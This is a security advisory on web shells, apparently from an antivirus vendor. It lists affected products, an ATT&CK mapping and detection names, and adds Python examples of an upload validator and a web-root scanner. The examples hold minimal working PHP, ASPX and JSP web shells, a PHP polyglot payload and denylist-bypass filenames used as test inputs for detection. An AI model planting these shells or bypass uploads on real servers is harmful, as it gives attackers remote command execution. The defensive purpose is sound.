Web shell proliferates as web server's vulnerabilities increase

    • Updated: 18 Dec 2020
    • Product/Version: Apex One 2019; Deep Discovery Email Inspector (all versions); Deep Discovery Inspector (all versions); Deep Security 12.0; OfficeScan XG; ScanMail for Exchange 14.0; Worry-Free Business Security Standard 10.0
Summary

A web shell is a piece of malicious code, usually written in a web development language such as PHP, ASP or JSP, that an attacker plants on a web server to gain remote access to the server and execute code on it.

To implant a web shell, attackers exploit security gaps in Internet-facing web servers, typically vulnerabilities in the web applications they host, for example CVE-2019-0604 (Microsoft SharePoint) or CVE-2019-16759 (vBulletin). Attackers locate exploitable vulnerabilities with network reconnaissance tools and then use the exploit to write the web shell onto the server. Once the web shell is in place, the attacker uses it as a foothold for further exploitation, escalating privileges and issuing commands remotely: adding, deleting and executing files, and running shell commands, executables or scripts.
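The implant step comes down to a file write the application never meant to allow, and file-upload handlers are the classic case (the network rule listed under Available Solutions targets exactly that kind of upload exploit). The following is an added example, not code from this article or from Trend Micro: it contrasts the extension denylist that many upload handlers ship with against an allowlist-plus-content check, and shows which filenames slip past the weak version. The function names, the extension lists and the sample byte strings are hypothetical.

```python
import re

# Extensions the web server would pass to a script handler. Illustrative list
# for this example; match it to the handlers actually enabled on your server.
EXECUTABLE_EXTS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "asp", "aspx", "asa", "ashx", "asmx", "cer", "jsp", "jspx",
    "cgi", "pl", "sh", "htaccess",
}
ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Multi-byte server-side script markers only, to keep false positives in
# compressed image data low.
SERVER_TAGS = re.compile(
    rb"<\?php\b|<\?=|<%[@=!]|<%\s*(eval|execute|response|request)\b", re.I
)


def weak_check(filename: str) -> bool:
    """The denylist many upload handlers ship with: accept anything not ending in .php."""
    return not filename.endswith(".php")


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Allowlist plus content check. Returns (accepted, reason)."""
    # Strip any client-supplied directory part before looking at the name.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if any(ord(c) < 32 for c in name):
        return False, "control character (e.g. NUL) in filename"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension, or dotfile such as .htaccess"
    ext = parts[-1]
    if ext not in ALLOWED_EXTS:
        return False, f"extension .{ext} not in allowlist"
    if any(p in EXECUTABLE_EXTS for p in parts[1:-1]):
        return False, "executable extension inside the filename (double extension)"
    if not data.startswith(MAGIC[ext]):
        return False, f"content is not a {ext} file"
    if SERVER_TAGS.search(data):
        return False, "server-side script marker inside image data (polyglot)"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the names an attacker tries against a denylist.
    jpeg = b"\xff\xd8\xff\xe0" + bytes(16)
    for name in ("shell.phtml", "shell.php.jpg", "shell.PHP", "shell.php\x00.jpg", ".htaccess"):
        print(f"{name!r:22} weak_check={weak_check(name)!s:5} "
              f"validate_upload={validate_upload(name, jpeg)}")
    print(validate_upload("photo.jpg", jpeg + b"<?php eval($_POST['c']); ?>"))
```

Even the stricter check only decides whether to accept the bytes; store accepted uploads under a server-generated name, outside the document root or in a directory with script execution disabled, and serve them with a fixed Content-Type, so that a check the code misses still does not turn into code execution.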

Once installed, a web shell gives the attacker the ability to:

  • Execute commands on the web server and steal data from it
  • Use the server as a launch pad for further attacks against the affected organization
  • Issue commands to hosts inside the network that have no direct Internet access
  • Upload additional malware, such as the China Chopper web shell, to stage watering hole attacks and scan for other victims
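Those capabilities show up in a web shell's source as a short path from a request parameter to an interpreter or shell call, which is what file-based detection keys on. The scanner below is an added example rather than the article's or Trend Micro's own detection logic: it walks a web root for scripts that hand request data to eval, system, Request.Item or Runtime.exec, and runs over a constructed sample web root holding one legitimate script and four minimal shells in the three languages the page names. The indicator patterns, file names and sample contents are illustrative assumptions.

```python
import os
import re
import tempfile

# Indicators that a server-side script hands request-controlled data to an
# interpreter or a shell. Heuristic patterns for this example only; they will
# not catch every obfuscation and should be tuned to your code base.
INDICATORS = [
    ("PHP: eval/assert on request data",
     re.compile(rb"\b(eval|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("PHP: shell execution on request data",
     re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("
                rb"[^\n]*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("PHP: eval of decoded/obfuscated payload",
     re.compile(rb"\beval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
    ("ASP/ASPX: eval on request data",
     re.compile(rb"\beval\s*\(\s*Request(\.Item)?\s*[\[(]", re.I)),
    ("JSP: Runtime.exec on request data",
     re.compile(rb"getRuntime\s*\(\s*\)\s*\.\s*exec\s*\([^\n]*request\.getParameter", re.I)),
]

SCRIPT_EXTS = (".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp", ".jspx")


def scan_file(path: str) -> list[tuple[str, int]]:
    """Return (indicator, line number) pairs for every match in one file."""
    with open(path, "rb") as fh:
        content = fh.read()
    findings = []
    for label, pattern in INDICATORS:
        for match in pattern.finditer(content):
            line_no = content.count(b"\n", 0, match.start()) + 1
            findings.append((label, line_no))
    return findings


def scan_tree(root: str) -> dict[str, list[tuple[str, int]]]:
    """Walk a web root; return only the script files that have at least one finding."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCRIPT_EXTS):
                continue
            path = os.path.join(dirpath, name)
            findings = scan_file(path)
            if findings:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                results[rel] = findings
    return results


# Constructed sample web root: one legitimate script and four minimal web
# shells in the styles the page lists (PHP, ASP, JSP). Not real malware
# samples; they exist only so the scanner has something to find.
SAMPLES = {
    "index.php": b"<?php\nrequire 'config.php';\necho htmlspecialchars($_GET['q']);\n",
    "uploads/img.php": b"<?php @eval($_POST['cmd']); ?>\n",
    "uploads/cache.php": b"<?php eval(gzinflate(base64_decode('ZWNobyAx'))); ?>\n",
    "cmd.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>\n',
    "admin/x.jsp": b'<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>\n',
}


def write_samples(root: str) -> None:
    for rel, data in SAMPLES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo() -> dict[str, list[tuple[str, int]]]:
    """Write the samples to a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory(prefix="webroot-") as root:
        write_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, findings in sorted(demo().items()):
        for label, line_no in findings:
            print(f"{rel}:{line_no}: {label}")
```

Run against a real document root, compare hits with a known-good baseline (a clean checkout or package manifest) rather than treating every match as a shell, and look first at scripts in upload or cache directories and at files modified after the last deployment. Shells that assemble function names at runtime or split the payload across variables will evade regexes like these, so static scanning should sit alongside the network and behavioural detections listed under Available Solutions.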

Capabilities

  • Information Theft
  • Backdoor commands
  • Exploits

Impact

  • Compromise system security - with backdoor capabilities that can execute malicious commands
  • Violation of user privacy - gathers user credentials and steals user information

Additional Threat Reference Information

Infection Chain

[Infection chain diagram: image not available in this copy]

MITRE ATT&CK Matrix

Behavior | Tactic | Technique
Attackers take advantage of security gaps in Internet-facing web servers | Initial Access | T1190: Exploit Public-Facing Application
The web shell lets attackers execute commands on the web server | Execution | T1035: Service Execution
Attackers install a web shell on a misconfigured Internet-facing web server | Persistence, Privilege Escalation | T1100: Web Shell
Compromised accounts are accessed | Credential Access | T1110: Brute Force
Attackers identify exploitable vulnerabilities using network reconnaissance tools | Discovery | T1087: Account Discovery; T1135: Network Share Discovery; T1121: Password Policy Discovery; T1069: Permission Groups Discovery
Web shell commands add, delete and execute files and run shell commands, executables or scripts | Lateral Movement | T1077: Windows Admin Shares
Harvests sensitive data and credentials | Collection | T1119: Automated Collection
Gathered information is sent to the attacker's C&C server | Exfiltration | T1041: Exfiltration Over Command and Control Channel

Several of these technique IDs have since been retired in ATT&CK: T1100 is now T1505.003 (Server Software Component: Web Shell), T1035 is T1569.002 (System Services: Service Execution), T1077 is T1021.002 (Remote Services: SMB/Windows Admin Shares) and T1121 is T1201 (Password Policy Discovery).
Details

Available Solutions

Solution Module | Solution Available | Pattern Branch | Release Date | Detection / Policy / Rules
Email Protection | N/A | - | - | -
URL Protection | Yes | In the Cloud | - | -
Advanced Threat Scan Engine (ATSE) | Yes | 15.675.00 | February 9, 2020 | -
Predictive Machine Learning | No | - | - | -
File detection (VSAPI) | Yes | ENT OPR 15.678.00 | February 11, 2020 | Backdoor.PHP.WEBSHELL.SMMR, Backdoor.ASP.WEBSHELL.KEQM, Backdoor.BAT.WEBSHELL.A, Backdoor.Perl.WEBSHELL.AD, Backdoor.PS1.WEBSHELL.A, Backdoor.VBS.WEBSHELL.AH, Backdoor.Win32.WEBSHELL.EQWK, HackTool.PHP.WEBSHELL.AC, Trojan.JS.WEBSHELL.AA, Trojan.PHP.WEBSHELL.SBJKSA
Network Pattern | Yes | NCIP 1.14037.00 | January 24, 2020 | KindEditor Possible WebShell File Upload Exploit - HTTP (Request)
Behavioral Monitoring (AEGIS) | No | - | - | -
Category: Remove a Malware / Virus
Solution Id: 000283514